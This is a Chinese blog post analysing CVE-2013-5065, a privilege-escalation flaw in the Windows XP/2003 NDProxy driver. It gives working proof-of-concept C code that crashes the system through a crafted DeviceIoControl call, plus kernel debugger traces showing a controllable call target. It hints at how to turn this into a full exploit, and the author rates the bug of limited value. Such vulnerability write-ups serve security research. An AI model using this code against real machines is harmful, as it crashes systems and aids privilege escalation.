CVE-2013-5065 EXP 源码及简要分析

浏览： ℃

字体：大中小

发布时间：2013-12-09 23:23:56

来源：

先上EXP和源码, 测试环境: VM下XP SP3

之前有个PoC
完整的PoC代码如下:

#include <windows.h>#include <stdio.h>int main(){    HANDLE hDev = CreateFile("////.//NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);    if(hDev==INVALID_HANDLE_VALUE)    {        printf("CreateFile Error:%d/n",GetLastError());    }    DWORD InBuf[0x15] = {0};    DWORD dwRetBytes  = 0;    *(InBuf+5) = 0x7030125;    *(InBuf+7) = 0x34;        DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0);    CloseHandle(hDev);        return 0;}

XP下执行PoC蓝屏, 异常在PxIODispatch上:

b203ec14 f88ed145 81f31a30 81a76c10 81f2b2c0 0x38b203ec34 804ef129 81f46ed8 000001b0 806d32d0 NDProxy!PxIODispatch+0x2b3b203ec44 80575dde 81e16df0 81a76c10 81e16d80 nt!IopfCallDriver+0x31b203ec58 80576c7f 81f46ed8 81e16d80 81a76c10 nt!IopSynchronousServiceTail+0x70b203ed00 8056f4ec 000007e8 00000000 00000000 nt!IopXxxControlFile+0x5e7b203ed34 8053e648 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2ab203ed34 7c92e4f4 000007e8 00000000 00000000 nt!KiFastCallEntry+0xf80012fe4c 7c92d26c 7c801675 000007e8 00000000 ntdll!KiFastSystemCallRet0012fe50 7c801675 000007e8 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc0012feb0 004010c2 000007e8 8fff23cc 0012ff28 0x7c8016750012ff80 004012e9 00000001 00380fc0 00381058 0x4010c20012ffc0 7c817067 00241fe4 0012f7bc 7ffde000 0x4012e90012fff0 00000000 00401200 00000000 78746341 0x7c817067

IDA定位到PxIODispatch:

kd> bp NDProxy!PxIODispatch下断:

kd> dd espb20b5c38 804ef129 8212b488 81b28ce8 806d32d0b20b5c48 80575dde 81b28d58 81ace8a8 81b28ce8b20b5c58 b20b5d00 80576c7f 8212b488 81b28ce8b20b5c68 81ace8a8 0012ff00 b20b5d01 b20b5d01b20b5c78 00000002 b20b5d64 0012fe80 8056f4c2b20b5c88 00000000 0012019f 80545edc 00000003b20b5c98 00000012 c0100080 8218aa28 00000e3cb20b5ca8 00000000 00000e40 00000000 81ace8eckd> dd 81b28ce8 +0xc81b28cf4 8212d490 8218ac38 8218ac38 0000000081b28d04 00000000 01010001 0c000000 0012fe8c81b28d14 00000000 00000000 00000000 0000000081b28d24 0012ff28 00000000 00000000 0000000081b28d34 00000000 8218aa28 00000000 0000000081b28d44 00000000 81b28d58 81ace8a8 0000000081b28d54 00000000 0005000e 00000024 0000005481b28d64 8fff23cc 00000000 8212b488 81ace8a8kd> dd 8212d490 8212d490 00000000 00000000 00000000 000000008212d4a0 00000000 07030125 00000000 000000348212d4b0 00000000 00000000 00000000 000000008212d4c0 00000000 00000000 00000000 000000008212d4d0 00000000 00000000 00000000 000000008212d4e0 00000000 00000000 0001000c 81ecdbf08212d4f0 0a060001 ee657645 00000001 000000018212d500 821b6980 00000000 81e55408 00000000

eax可控就简单多了是吧?

kd> gBreakpoint 2 hitNDProxy!PxIODispatch+0x2ad:0001313f ff90082086f8 call dword ptr NDProxy!TapiOids+0x8 (00018008)[eax]kd> reax=000001b0 ebx=81e2c2f8 ecx=00000000 edx=00000000 esi=81cc9368 edi=0001873ceip=0001313f esp=b1bd9c1c ebp=b1bd9c34 iopl=0 nv up ei pl nz na po nccs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202NDProxy!PxIODispatch+0x2ad:0001313f ff90082086f8 call dword ptr NDProxy!TapiOids+0x8 (00018008)[eax] ds:0023:000131b8=00000038

eax = 0x1b0 =0x24*3*4 <- 这不是最关键, 关键是eip:

照抄上次的MS13-046那个EXP里的代码就可以写出这个漏洞的exp了;
---------------
最后说一下个人对这个漏洞的评价: 鸡肋
首先是影响范围: XP SP3和2003 SP2, 这两个属于即将淘汰的系统了
第二是要开启Routing and Remote Access服务
第三(这点暂时不是很确定): 能执行exp的条件不仅要满足以上两点, 还应该是在Administrator权限下的;
用其他权限用户执行exp可能就提示: open //./NDProxy fail
也就是说, 你拿到了一个administrator权限, 然后执行了exp终于拿到了System权限了, 好高兴啊~_(:з」∠)_
---------------
--The 3nd--

>更多相关文章